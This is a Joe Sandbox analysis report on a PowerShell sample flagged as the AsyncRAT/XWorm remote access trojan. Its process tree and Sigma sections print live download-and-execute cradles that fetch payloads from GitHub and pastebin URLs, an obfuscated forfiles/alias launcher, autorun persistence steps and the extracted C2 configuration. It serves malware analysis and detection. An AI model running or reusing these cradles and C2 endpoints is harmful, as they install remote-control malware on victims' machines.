Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm_hiddenz.ps1

Overview

General Information

Sample name:cr_asm_hiddenz.ps1
Analysis ID:1534105
MD5:5ed9d262e083f101c1467ee317c1bc35
SHA1:b4e9654be8db562cb78fb6c7a7ddc37579205d50
SHA256:7282328d8678600716a8496a2036f00c5b5721a82ffab07998554cf2fad037f3
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to open files direct via NTFS file id
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4700 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3636 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 5108 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • powershell.exe (PID: 5584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 508 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • forfiles.exe (PID: 828 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4536 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1792 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7068 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/zNCj2Utm", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpUnknown_Malware_Sample_Jul17_2Detects unknown malware sample with pastebin RAW URLFlorian Roth
        • 0xb462:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
        • 0xa892:$s2: https://pastebin.com/raw/
        • 0xb415:$s3: My.Computer
        • 0xb3fc:$s4: MyTemplate
        0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x9fa6:$s8: Win32_ComputerSystem
        • 0xa5f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xa695:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xa7aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xad1c:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        13.2.powershell.exe.1e877e60000.2.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          13.2.powershell.exe.1e877e60000.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            13.2.powershell.exe.1e877e60000.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              13.2.powershell.exe.1e877e60000.2.raw.unpackUnknown_Malware_Sample_Jul17_2Detects unknown malware sample with pastebin RAW URLFlorian Roth
              • 0xb462:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
              • 0xa892:$s2: https://pastebin.com/raw/
              • 0xb415:$s3: My.Computer
              • 0xb3fc:$s4: MyTemplate
              13.2.powershell.exe.1e877e60000.2.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x9fa6:$s8: Win32_ComputerSystem
              • 0xa5f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xa695:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xa7aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xad1c:$cnc4: POST / HTTP/1.1
              Click to see the 11 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_4860.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x9a92:$b1: ::WriteAllBytes(
              • 0x8197:$s1: -join
              • 0x1943:$s4: +=
              • 0x1a05:$s4: +=
              • 0x5c2c:$s4: +=
              • 0x7d49:$s4: +=
              • 0x8033:$s4: +=
              • 0x8179:$s4: +=
              • 0xc1bc:$s4: +=
              • 0xc23c:$s4: +=
              • 0xc302:$s4: +=
              • 0xc382:$s4: +=
              • 0xc558:$s4: +=
              • 0xc5dc:$s4: +=
              • 0x9b2c:$e4: Get-WmiObject
              • 0x9bce:$e4: Get-WmiObject
              • 0xa6a5:$e4: Get-WmiObject
              • 0xa894:$e4: Get-Process
              • 0xa8ec:$e4: Start-Process
              amsi64_5812.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x9a92:$b1: ::WriteAllBytes(
              • 0x8197:$s1: -join
              • 0x1943:$s4: +=
              • 0x1a05:$s4: +=
              • 0x5c2c:$s4: +=
              • 0x7d49:$s4: +=
              • 0x8033:$s4: +=
              • 0x8179:$s4: +=
              • 0xc1bc:$s4: +=
              • 0xc23c:$s4: +=
              • 0xc302:$s4: +=
              • 0xc382:$s4: +=
              • 0xc558:$s4: +=
              • 0xc5dc:$s4: +=
              • 0x9b2c:$e4: Get-WmiObject
              • 0x9bce:$e4: Get-WmiObject
              • 0xa6a5:$e4: Get-WmiObject
              • 0xa894:$e4: Get-Process
              • 0xa8ec:$e4: Start-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 828, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 4536, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ProcessId: 316, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", ProcessId: 4700, ProcessName: csc.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 316, TargetFilename: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ProcessId: 316, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", ProcessId: 4700, ProcessName: csc.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-15T15:54:33.914799+020028033053Unknown Traffic192.168.2.949725104.20.3.235443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-15T15:54:18.466022+020028576591A Network Trojan was detected192.168.2.949722162.159.138.232443TCP
              2024-10-15T15:54:25.976667+020028576591A Network Trojan was detected192.168.2.949723162.159.138.232443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-15T15:54:04.138632+020028576581A Network Trojan was detected192.168.2.949712162.159.138.232443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/zNCj2Utm", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Sample uses string decryption to hide its real strings
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpackString decryptor: https://pastebin.com/raw/zNCj2Utm
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpackString decryptor: <123456789>
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpackString decryptor: <Xwormmm>
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpackString decryptor: XWorm V5.2
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpackString decryptor: USB.exe
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49724 version: TLS 1.2
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdbhP source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: n.pDB source: powershell.exe, 00000001.00000002.1929630337.0000020AB294E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdb source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49722 -> 162.159.138.232:443
              Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49723 -> 162.159.138.232:443
              Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.9:49712 -> 162.159.138.232:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://pastebin.com/raw/zNCj2Utm
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: unknownDNS query: name: pastebin.com
              Yara detected Generic Downloader
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /raw/zNCj2Utm HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/6db99fAK HTTP/1.1Host: pastebin.com
              Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
              Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
